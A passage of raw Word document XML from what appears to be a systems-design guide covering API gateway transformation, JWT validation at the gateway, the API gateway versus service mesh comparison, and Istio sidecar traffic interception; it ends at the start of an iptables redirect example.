    <w:p w14:paraId="4CDE2560" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CBCEE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F89CE5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Request/Response Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A8045E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why transformation is needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BC3CE0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API versioning:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> External clients use v1 format. Internal services use v3 format. The gateway translates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07783618" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol translation:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> External clients send REST/JSON. Internal services communicate via gRPC/protobuf. The gateway transcodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFEC98" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Internal service returns 50 fields. External API should only expose 10. Gateway strips sensitive fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E44DB3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="656"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aggregation (BFF — Backend For Frontend):</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Client needs data from 3 services. Instead of 3 round trips, the gateway calls all 3 and merges into one response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8594A2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How protocol transcoding works (REST → gRPC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA3E510" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client sends: GET /api/users/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50978B53" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Gateway maps URL pattern to gRPC method: UserService.GetUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C8DA4C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Gateway constructs protobuf request: GetUserRequest { id: 123 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146B8C13" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Calls the gRPC service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE96F0B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Receives protobuf response: User { id: 123, name: "Alice", ... }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255F767" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Serializes to JSON: {"id": 123, "name": "Alice", ...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700EE60" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="657"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Returns JSON to client with appropriate headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C5CF69" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Cloud Endpoints and Envoy</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> do this natively using gRPC-JSON transcoding annotations in the proto definition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2D6A0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Authentication and Authorization at the Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE065AF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why at the gateway (not in each service):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA9AED5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Centralized enforcement — one place to validate tokens, not every service independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA50D6D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Services trust the gateway — if a request reaches them, it's already authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900E596" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="658"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:lastRenderedPageBreak/>
        <w:t>Reduces duplication and potential inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274A746" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How JWT validation works at the proxy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304204F8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Request arrives with Authorization: Bearer eyJhbGc...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC55E14" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Gateway extracts the JWT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B72A1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Verifies signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD77652" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Fetch the public key from the issuer's JWKS endpoint (cached locally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3152F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Verify the JWT's signature against the public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B0A47C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Check claims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2FEEB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>exp (expiration) &gt; current time?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A36FE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>iss (issuer) is a trusted identity provider?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC7BE6" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>aud (audience) matches this API?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EA074A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If valid: extract user identity, inject as header (X-User-ID: 123), forward to backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65266877" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="659"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If invalid: return 401 immediately without touching the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D827B1E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key advantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> The backend never handles token validation. It simply trusts the X-User-ID header (because only the gateway can set it — direct backend access is blocked at the network level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9F83A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.4 API Gateway vs. Service Mesh — When to Use Which</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56"/>
        <w:gridCol w:w="3715"/>
        <w:gridCol w:w="3620"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="7463859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74AA1A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Concern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AE89E7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>API Gateway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ED3052" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Service Mesh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="296EB42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09D159" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Traffic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B0F9CD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>North-south (external → internal)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6C2FB3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>East-west (service → service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="33AE076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030D7F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Authentication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29913C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>External (JWT, API key, OAuth)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B58B4E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Internal (mTLS, service identity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="2C26B69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5DD820" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Rate limiting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390CD4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Per-client/API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AE0C9D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Per-service/per-route</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="212BF69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3739E9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Transformation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B579EF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>REST↔gRPC, versioning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139AF2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Minimal (same protocol)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="2D29264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9F5C3D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Routing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A26D26" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Path/host/header-based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420E3E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Service name-based</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="5736E8B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AE761E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:lastRenderedPageBreak/>
              <w:t>Position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F62E33" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Edge of the network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571113" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Between every service pair</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="708B3E40" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In practice:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> You use BOTH. API gateway at the edge for external traffic management. Service mesh internally for service-to-service reliability and observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E001CE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="53DF77C5">
          <v:rect id="_x0000_i3323" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B20CAF" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Sidecar Proxy — The Service Mesh Building Block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9D6F0A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 What a Sidecar Proxy Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9A7D4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>A proxy instance deployed alongside EVERY service instance in a 1:1 relationship. All network traffic in AND out of the service flows through its dedicated sidecar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6837A5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752BA7A7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>┌─────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBB578" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>│             Pod / VM                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD838C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>│                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC9295" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>│  [Application]  ←localhost→  [Sidecar Proxy]  ←network→  Other services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568060BA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>│   (port 8080)                (port 15001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160BB07D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>│                                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597E7AFC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>└─────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440EBA3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 How Traffic Interception Works (Kubernetes/Istio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299CC11B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> How do you force ALL traffic through the sidecar without modifying the application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8EA11" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution — iptables rules injected by an init container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54289665" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a pod starts with Istio sidecar injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E8339" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>An init container (istio-init) runs before the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119CF614" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="660"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>It sets up iptables rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9924F9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C37C8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t># Redirect all outbound traffic to the sidecar's port (15001)</w:t>
      </w:r>
    </w:p>
